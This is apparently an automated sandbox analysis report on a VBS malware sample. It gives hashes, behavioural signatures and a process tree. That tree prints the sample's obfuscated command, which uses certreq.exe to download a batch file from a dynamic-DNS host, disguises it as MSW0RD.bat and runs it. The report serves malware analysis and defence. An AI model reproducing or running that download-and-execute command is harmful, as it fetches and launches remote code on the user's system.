Analysis
-
max time kernel
66s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09-12-2022 02:28
Static task
static1
Behavioral task
behavioral1
Sample
91ef79825a38a6d9942f8963206785bc.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
91ef79825a38a6d9942f8963206785bc.vbs
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
f919de1034edc7b8a4a5a8aa8f0067dd.exe
Resource
win7-20220901-en
General
-
Target
91ef79825a38a6d9942f8963206785bc.vbs
-
Size
784B
-
MD5
4304fd3c7c6532cb19e0f29773b5e253
-
SHA1
333be879c7816ebc1417fad26953fc235e2cf2ac
-
SHA256
0593fa1832103b3903a35bbfab6f0331cb9031b75afeff791cc7d331f5c2a028
-
SHA512
faed7856e6f9e1933bd1730d1165c75e3dd12288fb7b5d9a3a6a2416efb5a592301aca98ce90562c59045d5f3e81b54c00d1afecc6634af85b330bd3c6ff2031
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
WScript.execmd.execmd.execmd.exedescription pid process target process PID 832 wrote to memory of 900 832 WScript.exe cmd.exe PID 832 wrote to memory of 900 832 WScript.exe cmd.exe PID 832 wrote to memory of 900 832 WScript.exe cmd.exe PID 900 wrote to memory of 996 900 cmd.exe cmd.exe PID 900 wrote to memory of 996 900 cmd.exe cmd.exe PID 900 wrote to memory of 996 900 cmd.exe cmd.exe PID 900 wrote to memory of 944 900 cmd.exe cmd.exe PID 900 wrote to memory of 944 900 cmd.exe cmd.exe PID 900 wrote to memory of 944 900 cmd.exe cmd.exe PID 996 wrote to memory of 1712 996 cmd.exe certreq.exe PID 996 wrote to memory of 1712 996 cmd.exe certreq.exe PID 996 wrote to memory of 1712 996 cmd.exe certreq.exe PID 944 wrote to memory of 1976 944 cmd.exe certreq.exe PID 944 wrote to memory of 1976 944 cmd.exe certreq.exe PID 944 wrote to memory of 1976 944 cmd.exe certreq.exe PID 944 wrote to memory of 1996 944 cmd.exe certreq.exe PID 944 wrote to memory of 1996 944 cmd.exe certreq.exe PID 944 wrote to memory of 1996 944 cmd.exe certreq.exe PID 944 wrote to memory of 1980 944 cmd.exe certreq.exe PID 944 wrote to memory of 1980 944 cmd.exe certreq.exe PID 944 wrote to memory of 1980 944 cmd.exe certreq.exe PID 944 wrote to memory of 1172 944 cmd.exe certreq.exe PID 944 wrote to memory of 1172 944 cmd.exe certreq.exe PID 944 wrote to memory of 1172 944 cmd.exe certreq.exe PID 944 wrote to memory of 1020 944 cmd.exe certreq.exe PID 944 wrote to memory of 1020 944 cmd.exe certreq.exe PID 944 wrote to memory of 1020 944 cmd.exe certreq.exe PID 944 wrote to memory of 1752 944 cmd.exe certreq.exe PID 944 wrote to memory of 1752 944 cmd.exe certreq.exe PID 944 wrote to memory of 1752 944 cmd.exe certreq.exe PID 944 wrote to memory of 1876 944 cmd.exe certreq.exe PID 944 wrote to memory of 1876 944 cmd.exe certreq.exe PID 944 wrote to memory of 1876 944 cmd.exe certreq.exe PID 944 wrote to memory of 1476 944 cmd.exe certreq.exe PID 944 wrote to memory of 1476 944 cmd.exe certreq.exe PID 944 wrote to memory of 1476 944 cmd.exe certreq.exe PID 944 wrote to memory of 1948 944 cmd.exe certreq.exe PID 944 wrote to memory of 1948 944 cmd.exe certreq.exe PID 944 wrote to memory of 1948 944 cmd.exe certreq.exe PID 944 wrote to memory of 316 944 cmd.exe certreq.exe PID 944 wrote to memory of 316 944 cmd.exe certreq.exe PID 944 wrote to memory of 316 944 cmd.exe certreq.exe PID 944 wrote to memory of 696 944 cmd.exe certreq.exe PID 944 wrote to memory of 696 944 cmd.exe certreq.exe PID 944 wrote to memory of 696 944 cmd.exe certreq.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91ef79825a38a6d9942f8963206785bc.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "/c sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat | Cmd /stART /b /mIn pING.exe & start C:\Users\Admin\AppData\Roaming\MSW0RD.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certreq.exeCeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat4⤵
-
C:\Windows\system32\cmd.exeCmd /stART /b /mIn pING.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certreq.exeCertReq -?4⤵
-
C:\Windows\system32\certreq.exeCertReq [-v] -?4⤵
-
C:\Windows\system32\certreq.exeCertReq [-Command] -?4⤵
-
C:\Windows\system32\certreq.exeCertReq [-Submit] [Options] [RequestFileIn [CertFileOut [CertChainFileOut [FullResponseFileOut]]]]4⤵
-
C:\Windows\system32\certreq.exeCertReq -Retrieve [Options] RequestId [CertFileOut [CertChainFileOut [FullResponseFileOut]]]4⤵
-
C:\Windows\system32\certreq.exeCertReq -New [Options] [PolicyFileIn [RequestFileOut]]4⤵
-
C:\Windows\system32\certreq.exeCertReq -Accept [Options] [CertChainFileIn4⤵
-
C:\Windows\system32\certreq.exeCertReq -Policy [Options] [RequestFileIn [PolicyFileIn [RequestFileOut [PKCS10FileOut]]]]4⤵
-
C:\Windows\system32\certreq.exeCertReq -Sign [Options] [RequestFileIn [RequestFileOut]]4⤵
-
C:\Windows\system32\certreq.exeCertReq -Enroll [Options] TemplateName4⤵
-
C:\Windows\system32\certreq.exeCertReq -Enroll -cert CertId [Options] Renew [ReuseKeys]4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/316-68-0x0000000000000000-mapping.dmp
-
memory/696-69-0x0000000000000000-mapping.dmp
-
memory/832-54-0x000007FEFC371000-0x000007FEFC373000-memory.dmpFilesize
8KB
-
memory/900-55-0x0000000000000000-mapping.dmp
-
memory/944-57-0x0000000000000000-mapping.dmp
-
memory/996-56-0x0000000000000000-mapping.dmp
-
memory/1020-63-0x0000000000000000-mapping.dmp
-
memory/1172-62-0x0000000000000000-mapping.dmp
-
memory/1476-66-0x0000000000000000-mapping.dmp
-
memory/1712-58-0x0000000000000000-mapping.dmp
-
memory/1752-64-0x0000000000000000-mapping.dmp
-
memory/1876-65-0x0000000000000000-mapping.dmp
-
memory/1948-67-0x0000000000000000-mapping.dmp
-
memory/1976-59-0x0000000000000000-mapping.dmp
-
memory/1980-61-0x0000000000000000-mapping.dmp
-
memory/1996-60-0x0000000000000000-mapping.dmp